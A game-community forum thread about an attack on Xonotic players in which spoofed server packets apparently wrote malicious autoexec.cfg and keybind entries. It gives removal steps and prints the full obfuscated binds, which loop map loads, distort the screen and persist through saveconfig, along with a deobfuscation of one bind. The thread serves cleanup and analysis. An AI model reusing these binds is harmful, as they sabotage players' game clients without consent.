Xonotic Virus

Hello all,

Recently, there has been reports of wobbly screens and binds overwritten. After some investigation, we discovered an exploit that has been used to redirect clients to a modified server, which then creates a custom autoexec.cfg in the user's data directory.
While the exploit is in the process of being fixed, we can't fix the changes to your configuration made by this "virus" automatically.


Steps for removal:
1. Delete the malicious autoexec.cfg (Windows: C:\Users\yourusername\Saved Games\xonotic\data\autoexec.cfg, Linux: ~/.xonotic/data/autoexec.cfg, Mac: ~/Library/Application Support/xonotic/data/autoexec.cfg)
2. Launch the game and open the console (SHIFT+ESC, or ~), then type the following and press ENTER: v_idlescale 0
3. Check the Settings/Input menu for any suspicious looking keybinds and reset them to default

Can this only change keybinds and run in-game/autoexec commands or is there potential for something worse to happen?

Umm, eh about that. I don't have an autoexec file on ~/.xonotic/data. Does that mean I'm safe? And my v_idlescale is 0 by default.

The game is sandboxed fairly well, what this script has done is about as bad as it can get.

Does it affect people that symlinked their autoexec.cfg to dropbox, etc.?

It might propagate to Dropbox too, if the symlink had a writable destination.

The removal steps though are not sufficient. I'd rather recommend editing config.cfg and removing any suspicious binds (any line longer than a screen length is probably wrong). Can also remove the v_idlescale command while at it.

For a little more details on what this looks like, the following lines were discovered in autoexec.cfg and config.cfg:

Code:

bind BACKSLASH "toggleconsole;alias g_fnbwnjlts0 \"\";alias g_fnbwnjlts1 \"alias cl_hook_gamestart_all \\\"map implosion;cl_hook_gamestart_all\\\";cl_hook_gamestart_all;\";menu_cmd rpn /g_igdpbhxyhlodf $cl_matchcount $r_bjsgmspjglr gt def;g_fnbwnjlts${g_igdpbhxyhlodf};menu_cmd rpn /g_igdpbhxyhlodf $vid_gqfhyyvfq $cl_matchcount gt def;g_fnbwnjlts${g_igdpbhxyhlodf};unset vid_gqfhyyvfq;unset r_bjsgmspjglr;unbind ~;bind ~ toggleconsole;unbind `;bind ` toggleconsole;unbind BACKSLASH;bind BACKSLASH toggleconsole;unbind ^;bind ^ toggleconsole;unbind t;bind t messagemode;unbind F5;bind F5 menu_showteamselect;unbind F6;bind F6 team_auto;saveconfig;"
bind ^ "toggleconsole;alias g_fnbwnjlts0 \"\";alias g_fnbwnjlts1 \"alias cl_hook_gamestart_all \\\"map implosion;cl_hook_gamestart_all\\\";cl_hook_gamestart_all;\";menu_cmd rpn /g_igdpbhxyhlodf $cl_matchcount $r_bjsgmspjglr gt def;g_fnbwnjlts${g_igdpbhxyhlodf};menu_cmd rpn /g_igdpbhxyhlodf $vid_gqfhyyvfq $cl_matchcount gt def;g_fnbwnjlts${g_igdpbhxyhlodf};unset vid_gqfhyyvfq;unset r_bjsgmspjglr;unbind ~;bind ~ toggleconsole;unbind `;bind ` toggleconsole;unbind BACKSLASH;bind BACKSLASH toggleconsole;unbind ^;bind ^ toggleconsole;unbind t;bind t messagemode;unbind F5;bind F5 menu_showteamselect;unbind F6;bind F6 team_auto;saveconfig;"
bind BACKQUOTE "toggleconsole;alias g_fnbwnjlts0 \"\";alias g_fnbwnjlts1 \"alias cl_hook_gamestart_all \\\"map implosion;cl_hook_gamestart_all\\\";cl_hook_gamestart_all;\";menu_cmd rpn /g_igdpbhxyhlodf $cl_matchcount $r_bjsgmspjglr gt def;g_fnbwnjlts${g_igdpbhxyhlodf};menu_cmd rpn /g_igdpbhxyhlodf $vid_gqfhyyvfq $cl_matchcount gt def;g_fnbwnjlts${g_igdpbhxyhlodf};unset vid_gqfhyyvfq;unset r_bjsgmspjglr;unbind ~;bind ~ toggleconsole;unbind `;bind ` toggleconsole;unbind BACKSLASH;bind BACKSLASH toggleconsole;unbind ^;bind ^ toggleconsole;unbind t;bind t messagemode;unbind F5;bind F5 menu_showteamselect;unbind F6;bind F6 team_auto;saveconfig;"
bind t "alias r_cgvanntqqgmys \"menu_cmd rpn /vid_mfiemnps vid_mfiemnps 0.1 + def;set v_idlescale $vid_mfiemnps; defer 1 r_cgvanntqqgmys\";alias g_fnbwnjlts0 \"\";alias g_fnbwnjlts1 \"alias cl_hook_gamestart_all \\\"map implosion;cl_hook_gamestart_all\\\";alias cl_hook_gameend cl_hook_gamestart_all;defer 150 r_cgvanntqqgmys\";menu_cmd rpn /g_igdpbhxyhlodf $cl_matchcount $r_bjsgmspjglr gt def;g_fnbwnjlts${g_igdpbhxyhlodf};menu_cmd rpn /g_igdpbhxyhlodf $vid_gqfhyyvfq $cl_matchcount gt def;g_fnbwnjlts${g_igdpbhxyhlodf};unset vid_gqfhyyvfq;unset r_bjsgmspjglr;unbind ~;bind ~ toggleconsole;unbind `;bind ` toggleconsole;unbind BACKSLASH;bind BACKSLASH toggleconsole;unbind ^;bind ^ toggleconsole;unbind t;bind t messagemode;unbind F5;bind F5 menu_showteamselect;unbind F6;bind F6 team_auto;saveconfig;messagemode;"
bind TILDE "toggleconsole;alias g_fnbwnjlts0 \"\";alias g_fnbwnjlts1 \"alias cl_hook_gamestart_all \\\"map implosion;cl_hook_gamestart_all\\\";cl_hook_gamestart_all;\";menu_cmd rpn /g_igdpbhxyhlodf $cl_matchcount $r_bjsgmspjglr gt def;g_fnbwnjlts${g_igdpbhxyhlodf};menu_cmd rpn /g_igdpbhxyhlodf $vid_gqfhyyvfq $cl_matchcount gt def;g_fnbwnjlts${g_igdpbhxyhlodf};unset vid_gqfhyyvfq;unset r_bjsgmspjglr;unbind ~;bind ~ toggleconsole;unbind `;bind ` toggleconsole;unbind BACKSLASH;bind BACKSLASH toggleconsole;unbind ^;bind ^ toggleconsole;unbind t;bind t messagemode;unbind F5;bind F5 menu_showteamselect;unbind F6;bind F6 team_auto;saveconfig;"
bind F5 "alias r_cgvanntqqgmys \"menu_cmd rpn /vid_mfiemnps vid_mfiemnps 0.1 + def;set v_idlescale $vid_mfiemnps; defer 1 r_cgvanntqqgmys\";alias g_fnbwnjlts0 \"\";alias g_fnbwnjlts1 \"alias cl_hook_gamestart_all \\\"map implosion;cl_hook_gamestart_all\\\";alias cl_hook_gameend cl_hook_gamestart_all;defer 150 r_cgvanntqqgmys\";menu_cmd rpn /g_igdpbhxyhlodf $cl_matchcount $r_bjsgmspjglr gt def;g_fnbwnjlts${g_igdpbhxyhlodf};menu_cmd rpn /g_igdpbhxyhlodf $vid_gqfhyyvfq $cl_matchcount gt def;g_fnbwnjlts${g_igdpbhxyhlodf};unset vid_gqfhyyvfq;unset r_bjsgmspjglr;unbind ~;bind ~ toggleconsole;unbind `;bind ` toggleconsole;unbind BACKSLASH;bind BACKSLASH toggleconsole;unbind ^;bind ^ toggleconsole;unbind t;bind t messagemode;unbind F5;bind F5 menu_showteamselect;unbind F6;bind F6 team_auto;saveconfig;menu_showteamselect;"
bind F6 "alias r_cgvanntqqgmys \"menu_cmd rpn /vid_mfiemnps vid_mfiemnps 0.1 + def;set v_idlescale $vid_mfiemnps; defer 1 r_cgvanntqqgmys\";alias g_fnbwnjlts0 \"\";alias g_fnbwnjlts1 \"alias cl_hook_gamestart_all \\\"map implosion;cl_hook_gamestart_all\\\";alias cl_hook_gameend cl_hook_gamestart_all;defer 150 r_cgvanntqqgmys\";menu_cmd rpn /g_igdpbhxyhlodf $cl_matchcount $r_bjsgmspjglr gt def;g_fnbwnjlts${g_igdpbhxyhlodf};menu_cmd rpn /g_igdpbhxyhlodf $vid_gqfhyyvfq $cl_matchcount gt def;g_fnbwnjlts${g_igdpbhxyhlodf};unset vid_gqfhyyvfq;unset r_bjsgmspjglr;unbind ~;bind ~ toggleconsole;unbind `;bind ` toggleconsole;unbind BACKSLASH;bind BACKSLASH toggleconsole;unbind ^;bind ^ toggleconsole;unbind t;bind t messagemode;unbind F5;bind F5 menu_showteamselect;unbind F6;bind F6 team_auto;saveconfig;team_auto;"

Deobfuscating one of the binds, it appears to create a recursive call to an alias by using a strange rpn calculate to essentially get a 1 or 0 value that correlate with the two aliases, g_fnbwnjlts0 and g_fnbwnjlts1.

The code caused quakec to crash, resulting in a hung client when I attempted to drop the terminal using tilde.

I'm not sure if this was the intended behavior or not.

As for now it appears this was just an annoyance.

Code:

// These values were set by the script and are referenced below
// seta "r_bjsgmspjglr" "9653"
// seta "vid_gqfhyyvfq" "9644"
//      "cl_matchcount" "9713"

// "Pretty print"
bind BACKSLASH "
    toggleconsole;

    alias g_fnbwnjlts0 \"\";alias g_fnbwnjlts1 \"alias cl_hook_gamestart_all \\\"map implosion;cl_hook_gamestart_all\\\";cl_hook_gamestart_all;\";

    menu_cmd rpn /g_igdpbhxyhlodf $cl_matchcount $r_bjsgmspjglr gt def;
    g_fnbwnjlts${g_igdpbhxyhlodf};

    menu_cmd rpn /g_igdpbhxyhlodf $vid_gqfhyyvfq $cl_matchcount gt def;
    g_fnbwnjlts${g_igdpbhxyhlodf};

    unset vid_gqfhyyvfq;
    unset r_bjsgmspjglr;
    unbind ~;         bind ~ toggleconsole;
    unbind `;         bind ` toggleconsole;
    unbind BACKSLASH; bind BACKSLASH toggleconsole;
    unbind ^;         bind ^ toggleconsole;
    unbind t;         bind t messagemode;
    unbind F5;        bind F5 menu_showteamselect;
    unbind F6;        bind F6 team_auto;
    saveconfig;
"

// interpreted values (when the bind is pressed)
/////////////////////////////////////////////////

// This is the first nested alias command in the bind
alias g_fnbwnjlts0 \"\";alias g_fnbwnjlts1 \"alias cl_hook_gamestart_all \\\"map implosion;cl_hook_gamestart_all\\\";cl_hook_gamestart_all;\";

menu_cmd rpn /g_igdpbhxyhlodf $cl_matchcount $r_bjsgmspjglr gt def;    // menu_cmd rpn /g_igdpbhxyhlodf 9713 9653 gt def;
// g_igdpbhxyhlodf is "1" [""]

g_fnbwnjlts${g_igdpbhxyhlodf};                                         // runs command: g_fnbwnjlts1

menu_cmd rpn /g_igdpbhxyhlodf $cl_matchcount $r_bjsgmspjglr gt def;    // menu_cmd rpn /g_igdpbhxyhlodf 9713 9653 gt def;
// g_igdpbhxyhlodf is "0" [""]

g_fnbwnjlts${g_igdpbhxyhlodf};                                         // runs command: g_fnbwnjlts0

// ... binds ...

saveconfig

What or who is creating these viruses?

I suspect it's probably the people behind Nexuiz Antivirus program.

HAHA!!!!! I had that about a week ago!!!! I realized that some of my binds and aliases stopped working, and that my game would get stuck on loading screens, after a map would end, or sometimes would throw me out upon connecting. Took a look at my config and it was messed up, so I just deleted it, the game generated a default one and then I was ok.

So, i have just decided to register on the forums because of all of this.

Thanks for all the input on the topic, but the thing i'm (and possibly other players too) really waiting for is detailed technical info on how such exploit was even possible, how the attackers managed to inject malicious code and pass it through, and what are other, much more dangerous risks this exploit pottentially poses for both Windows and GNU/Linux players (since it could have been much worse according to the person who claimed to be the troll behind this on the IRC). Of course i'm against disclosing any sensitive details until the game is fixed, that is until next update, to prevent others from trying to abuse it even more.

The fact is, i have unfortunately quit playing Xon for now because of this happening, because i run Xonotic on my main machine, and i don't own any spare PC to set it up for running risky things, so i have high hopes for a bulletproof solution in the next release. It's pretty sad, maybe even shameful to see such things happening in a relatively niche, open source game with good community around it, and there's something ironic in the fact that my goal was to find a game free from trolls and malware, and now we're getting this. What is Xonotic's blessing from gameplay point of view, is also a curse from security POV, that is, so many things are provided server-side (including the code), thus pottentially exploitable.

Anyway, best luck to the devteam dealing with this poop.

Found something that I don't understand in my config. It's under "net_slists_favorites" which is a segment for favorited servers, it shows a bunch of IP addresses and then some weird looking chunks of code. Is this normal config stuff or part of the virus?

Code:

"net_slist_favorites" "136.243.145.236:30003 85.25.47.35:26000 theregulars.eu:26001 80.95.150.251:26000 91.250.119.24:26000 146.0.36.65:26001 176.9.65.177:30003 176.9.65.177:30160 37.221.196.102:26000 213.198.94.130:26500 78.46.52.34:26042  130.149.55.207:26045 94.23.20.72:26010 84.201.39.203:26000 78.46.77.131:26006 eavhJ1aGrTl9qmGUhpJmikn+QOWr/xdoilQv/HWqUDg= TSmq9MV0YYaplcNVI8fTstFDI6lOkZAUfw5lJX3cooo= 3EEGBqGZW2rL4v7ERvzd9ZIU+okSuwPTtbIjf0vJSF4= Mc18V9hyVsXUN5vPzw17Mh3Q1WFEW8Mc0ZkwpU10m5k= lDpj28sgSytBdGtYH71+FrGGttHAoImeMpS6ZtqrsHE= YKo9fimYMBr3wortHFeMVCRhmnZr3AaIOx9IhFhm4Cc= qlcsRejpAi6GJTcqTzgRVfunKxUAmMI9Xpkp//B8hxg= ZKEs6G/40kFInTGd62d+NjSGOY8RPOejic7W/CLkxMA= odP0r571SEU5iX3nRPQeQDFpfhmyGYC4m4SamMSTEMI= jE6Zhvs5sOvKYUF9yra1Eh4yRfGJirFTXlURewJSSuc= 6lqsM0FIQ5JZbrEdjWY91/xCubUBbhIGUh1rgXIGUgs= tgVwyVN7pdXheg3eZCdO/WC3OylP5Qt1ptbOO4g7B/U= 7NnI7PyTvlhNUf10mEnlu0aH7nj19EZoXVOaHdZrFnU= Ot40nQJtTVHpdMEUgmBmVb6yvGfbIUneP2Al/lbD5TM= kV3UkVGqke8UhrgIWKhTOU/nDhk3f+OT7TVEfqh9xy0= 7hWPnEroUpCzlCIiQ4d0/U/4/hKFj9VjElarGFZayKw= fdx4J4EsHEqtnzwKhsxrvRkYpYhSuUfJZs301oU1l8c= DtMRmj4DVBZqgipV6C2hpOyFsnn4TM1it7kDlUTfmOg= fpd0YafKdywMMxHR5xAwyK4Xn/POe67n52a1wKNS3dY= a4J2Rijt3LvrscsZuzK+sMHJwTrcHRAw+CZ6l8OqdnY= aMU1pg9RFidLuNDPOqISqv66O9c0p+ENL/dX2r5Zzd0= OrqjVkTWmrxxgzezUGPyS7Og8vCBjuGGg0jaYyEoTmY= 3JUXyCnH75jjUcV6LJywVHKVKJTr0XxJupRO5sgLah4= ChCqZDqGnEYzT3Edng6is9BycxImC76LBg48869NhB8= RToXbhWy2WDQSJGuomdZTgmemsvXXhdXqAUDPmWphpg= PWB/fupA8iK+j3WjfyxQPIbMPInn93LBJLHBk5iN1TA= jkPN+tds2TTkBH5zHAoRqTsNiHZsxnYyhuFAQPU3jwk= l/i6gGNTlRSGGxyufKIhXMgDMz3m5nzil4Wlt2uKALg= DqnhpOb5AKJqnvt0GvhemrxJk7jRKRfwL3w61eSbCXA= nSzaAv9Fwy3nXaVIqifeJJmXWHvQfHQkCKhcQt1PI/k= 1J+eIDbvcTTj6/EXp+QHnFl9NHInD34N2boaa8c+WjI= Cq4VCIRT0nDlpvrVC7YjvMOvAt0dx8hJfZZqCV0LDaY= BGqDEvHd99T1WcPOyIo6oaiC/WjtztOLpNcNjAEmvA0= qwJp40inHRn+vxB5qeI8mfXu7guGf9llVNdaiC/rR0c= DPUta7v9M9YLYe5gQFdLQvHiJNINt78Dk1/0EhoTflE= 43qjhvu/xqmD6IiDY0zhRJk36UoDLGKgmOCOxgOBluw= MID1nq2ihzyydhUBH0MK9IbA1zsvbRflxOZ+xWaDggM= /U/a7XxRzDVJ2G3Wt8+0FPi+2Tr9FEzHx4HnTeH9SSs= Eo2hrrSEwyxiGsWutwQ/A3gDJFx1cV7enbSjaBL96HA= AYQDHffb3DyZCchaJKjNcDrtNV2ln4/VAayaTzLMmwA= Hl+nHXrPWGAiDOYpNANX0qUKGCzV+K0GVMlWCHCNmHc= V1w2u7Zt3yFlB3poz3dF+t+4SMsQeIhZiirbjR9GnAQ= cfTWCVMoaEXWtSvJyWhWp04abgwA4KVO9NJYhleDZzg= J9dUTTVQN6gRBDtrEGiVfrsGQ/UgGii5Ba+9C775aN4= 3TgWwpTKPPdrrunW27tMQDg5O/Ch2q4YtH6w1dSVXFg= E6vPsyfte6Ly/gZt8H33yHq9UF6uXaoV0KBlshXrSy4= GADBgOOY1Vpo2kUhnWQO0Is8vxsDxmgBgbF5UrRZNIQ= tIRcKUTikyNCSHm5xGiLdQE66ok6+xW080Cclgc+aqw= o4fBETBPdCs+5T1JYy7CLKKCPkGMO7RSH+32q9v+CfM= 6QtAVwbWcJFYZDvSeuZHEaaJE4JoTzmNni/LPZUSOKE= J9JepdOZjvCBXYfz8fj3civ4PulKF4/asnK9u5ZojYg= gcYJTjKtN2qjsJjL8pO/VqBERO2A9YhloJbriEYFUwg= F0xBweCwFKeiVMtkW4NgBic6m+a+PcUy8NZnWqxpWI4= f7dLd940u4KlLaxUPdwozZL5bPmVKi9CYBMYczkm1+c="

[/quote]

Those look normal enough, they're stats IDs (hopefully for servers you've bookmarked). They're more likely to still work even if the server changes its IP.

I would say that we have been let off easily by this hacker. It would have been much worse if it had set cvar rm_rf to 1.

rm_rf isn't a cvar anymore. That's good.

Maybe if Xonotic didn't suck so bad

Maybe if Xonotic didn't suck so bad

Welcome to Xonotic, here's a tutorial for newbies:

http://xonotic.org/posts/2014/halogenes-...-tutorial/

This is hilarious. What was the injection path? Did they poison some random server or a centralized piece like the stats server? The effects of the least interesting thing, what interests me and what matters is how the code was injected in the first place.

As far as I know, the attack was a sort of "man-on-the-side" attack which boils down to UDP packets from an attack server attacking like a legitimate server arriving on the client fast than legit packets.

Servers with encryption enabled are not affected because these servers can be identified with div's double-blind encryption. An attacker would have to have that server's private key to execute the attack in that case.